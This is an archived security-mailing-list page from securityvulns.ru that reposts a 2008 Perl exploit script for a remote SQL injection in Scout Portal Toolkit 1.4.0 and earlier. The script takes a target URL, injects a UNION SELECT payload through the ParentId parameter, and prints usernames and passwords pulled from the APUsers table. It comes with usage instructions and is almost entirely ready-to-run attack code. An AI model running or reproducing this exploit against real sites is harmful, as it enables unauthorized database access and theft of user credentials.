Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Security Advisory for Bugzilla 3.0.3, 3.1.3, 2.22.3, and 2.20.5

  [ GLSA 200805-02 ] phpMyAdmin: Information disclosure

  QTOFileManager V 1.0<== Remote File Upload Vulnerability

  Power Editor LOCAL FILE INCLUSION Vulnerbility

From:Jose Luis Góngora Fernández <sys-project_(at)_hotmail.com>
Date:06.05.2008
Subject:Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit

#!/usr/bin/perl

# Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit
# Discovered & Coded by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team / Sys - Project / EspSeC
# http://www.spanish-hackers.com
# rgod forever :D


print "\t\t########################################################\n\
n";
print "\t\t#  Scout Portal Toolkit <= 1.4.0 SQL Injection Exploit #\n\n";
print "\t\t#                       by JosS                        #\n\n";
print "\t\t########################################################\n\
n";

use strict;
use LWP::UserAgent;

my $victim = $ARGV[0];

if(!$ARGV[0]) {
   print "\n[x] Scout Portal Toolkit <= 1.4.0 Remote SQL Injection Exploit\n";
   print "[x] written by JosS - sys-project[at]hotmail.com\n";
   print "[x] usage: perl xpl.pl [host]\n";
   print "[x] example: http://localhost/path/\n\n";
   exit(1);
}

   print "\n[+] Exploiting...\n";
   my $cnx = LWP::UserAgent->new() or die;
   my $go=$cnx->get($victim."/SPT--BrowseResources.
php?ParentId=337+and+1=2+union+all+select+0,1,2,3,4,concat(UserName,
char(34),UserPassword),6,7,8+from+APUsers/*");
   if ($go->content =~ m/APUsers\/\*\' class=\'\'>(.*?)\<\/a>/ms)
{
       print "[+] $1\n\n";
   } else {
       print "\n[-] exploit failed\n";
   }

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 



Rating@Mail.ru